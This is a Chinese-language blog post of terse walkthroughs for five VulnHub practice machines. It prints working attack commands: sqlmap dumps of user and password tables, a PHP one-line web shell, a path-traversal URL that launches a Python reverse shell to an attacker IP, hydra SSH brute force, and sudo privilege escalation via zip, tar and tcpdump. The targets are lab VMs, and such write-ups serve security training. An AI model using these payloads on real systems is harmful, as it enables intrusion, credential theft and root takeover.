vulnhub 5

目录

 

pinkys-palace-v1,225

1.端口扫描

2.访问8080端口显示403,使用代理后尝试

3.ssh登录pinkymanage用户

4.提权

zico2-1,210

1.端口扫描

​2.查看web服务,存在本地文件包含漏洞

​3.利用phpliteadmin漏洞写入一句话

4.切换至zico账号进行提权

lord-of-the-root-101,129

1.端口扫描和端口碰撞

​2.查看1337端口

3.sqlmap爆破数据库

4.ssh登录

​5.提权

tr0ll-1,100

1.端口扫描

​2.利用ftp

​3.分析pcap包

4.下载分析文件

5.提权

web-developer-1,288

1.端口扫描

​2.目录爆破,访问ipdata

​3.wireshark分析analyze.cap

​4.ssh登录,提权获取flag


pinkys-palace-v1,225

1.端口扫描

2.访问8080端口显示403,使用代理后尝试

gobuster进行爆破

gobuster dir -p http://192.168.43.113:31337 -u http://127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

sql注入

sqlmap -u http://127.0.0.1:8080/littlesecrets-main/login.php --level=3 --proxy http://192.168.43.113:31337 --data="user=admin&pass=admin" -D pinky_sec_db -T users -C uid,user,pass --dump-all --batch --threads 10

3.ssh登录pinkymanage用户

网站根目录存在pinky的密钥,保存后登录pinky账号

cat .ultrasecret | base64 -d

将密钥复制到本地

4.提权

 

zico2-1,210

1.端口扫描

2.查看web服务,存在本地文件包含漏洞

目录爆破

gobuster dir -u http://192.168.43.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

尝试登录phpLiteAdmin

3.利用phpliteadmin漏洞写入一句话

<?php echo system($_GET["cmd"]);?>    #写入一句话
http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=pwd

http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.2",5522));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'    #反弹shell

查看wordpress配置文件

4.切换至zico账号进行提权

zip提权

touch /tmp/exploit
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"

tar提权

sudo /bin/tar cf /dev/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash

 

lord-of-the-root-101,129

1.端口扫描和端口碰撞

hping3 -S 192.168.43.170 -p 1 -c 1 
hping3 -S 192.168.43.170 -p 2 -c 1 
hping3 -S 192.168.43.170 -p 3 -c 1 

2.查看1337端口

robots页面有base64编码内容,进行解码

3.sqlmap爆破数据库

 sqlmap -o -u "http://192.168.43.170:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump --batch

4.ssh登录

5.提权

 

tr0ll-1,100

1.端口扫描

2.利用ftp

3.分析pcap包

4.下载分析文件

访问0x0856BF目录

hydra爆破ssh

hydra -L user.txt -p pass.txt 192.168.43.11 ssh

5.提权

 

web-developer-1,288

1.端口扫描

2.目录爆破,访问ipdata

3.wireshark分析analyze.cap

查看http协议中的post请求

4.ssh登录,提权获取flag

webdeveloper@webdeveloper:/tmp$ touch exploit
webdeveloper@webdeveloper:/tmp$ echo 'cat /root/flag.txt' > /tmp/exploit
webdeveloper@webdeveloper:/tmp$ chmod +x /tmp/exploit
webdeveloper@webdeveloper:/tmp$ 
webdeveloper@webdeveloper:/tmp$ sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值